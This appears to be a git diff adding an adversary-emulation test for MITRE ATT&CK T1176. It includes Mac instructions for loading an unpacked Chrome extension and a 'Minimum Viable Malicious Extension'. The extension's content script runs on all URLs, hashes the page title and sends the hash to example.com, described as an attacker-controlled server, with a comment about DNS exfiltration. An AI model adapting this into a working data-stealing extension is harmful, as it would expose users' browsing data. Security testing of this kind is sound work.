diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..a8b5f435
--- /dev/null
+++ b/Mac/Collection/Browser_Extensions.md
@@ -0,0 +1,10 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
+Then click 'Select'
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+    // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+    // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+    // and probably a thousand other methods. But this one is easy.
+    var buffer = new TextEncoder("utf-8").encode(str);
+    return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+    // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+    // except it's example.com so w/e
+    var digest = hex(buffer);
+    var url = "https://example.com/" + digest;
+    console.log("Exfiltrating data to " + url)
+    var xmlHttp = new XMLHttpRequest();
+    xmlHttp.open( "GET", url, true);
+    xmlHttp.send( null);
+    return digest;
+}
+
+function hex(buffer) {
+    // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+    var hexCodes = [];
+    var view = new DataView(buffer);
+    for (var i = 0; i < view.byteLength; i += 4) {
+        var value = view.getUint32(i)
+        var stringValue = value.toString(16)
+        var padding = '00000000'
+        var paddedValue = (padding + stringValue).slice(-padding.length)
+        hexCodes.push(paddedValue);
+    }
+    var athing = hexCodes.join("");
+    return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/manifest.json
@@ -0,0 +1,16 @@
+{
+  "name": "Minimum Viable Malicious Extension",
+  "description": "Base Level Extension",
+  "version": "1.0",
+  "manifest_version": 2,
+  "content_scripts": [
+    {
+      "matches": [
+        "<all_urls>"
+      ],
+      "js": [
+        "inline.js"
+      ]
+    }
+  ]
+}
\ No newline at end of file